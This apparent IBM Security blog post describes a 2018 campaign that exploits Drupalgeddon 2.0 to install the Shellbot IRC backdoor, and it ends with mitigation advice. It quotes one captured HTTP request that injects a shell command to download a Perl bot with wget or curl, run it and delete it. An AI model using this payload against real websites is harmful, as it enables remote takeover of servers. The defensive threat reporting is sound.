IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

ShellBot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

IP Address Suspicious Request /?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget /lip;perl;cd /tmp;curl -O /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru
Scroll to view full table

Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both these flaws have been patched, but vulnerabilities persists as users delay in patching and upgrading.

As we continued to look into the attack, vulnerable websites were scanned for the /user/register and /user/password pages in the installation phase as attackers tried to brute-force their way in with existing user access details discovered while attempting to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.

Shellbot Resurfaces

Shellbot itself is an old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files per the attacker’s command, and change the endpoint’s settings, to name a few.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, in the heat of Apache Struts (CVE-2017-5638), ShellBot was packaged as the C&C with the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Use updated protocols such as HTTPS and upgrade if need be.
  • Update CMSs to the most recent version and use all available patches.
  • Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
  • Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.

Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.

Uncover the Value of Digital Fraud Protection

More from Software Vulnerabilities

X-Force Prevents Zero Day from Going Anywhere

8 min read - This blog was made possible through contributions from Fred Chidsey and Joseph Lozowski. The 2023 X-Force Threat Intelligence Index shows that vulnerability discovery has rapidly increased year-over-year and according to X-Force’s cumulative vulnerability and exploit database, only 3% of vulnerabilities are associated with a zero day. X-Force often observes zero-day exploitation on Internet-facing systems as a vector for initial access however, X-Force has also observed zero-day attacks leveraged by attackers to accomplish their goals and objectives after initial access was…

8 min read

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

12 min read - ‘Patch Tuesday, Exploit Wednesday’ is an old hacker adage that refers to the weaponization of vulnerabilities the day after monthly security patches become publicly available. As security improves and exploit mitigations become more sophisticated, the amount of research and development required to craft a weaponized exploit has increased. This is especially relevant for memory corruption vulnerabilities.Figure 1 — Exploitation timelineHowever, with the addition of new features (and memory-unsafe C code) in the Windows 11 kernel, ripe new attack surfaces can…

12 min read

Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers

17 min read - Overview In this post, IBM Security X-Force Red offensive hackers analyze how attackers, with elevated privileges, can use their access to stage Windows Kernel post-exploitation capabilities. Over the last few years, public accounts have increasingly shown that less sophisticated attackers are using this technique to achieve their objectives. It is therefore important that we put a spotlight on this capability and learn more about its potential impact. Specifically, in this post, we will evaluate how Kernel post-exploitation can be used…

17 min read

Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP”

10 min read - September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a…

10 min read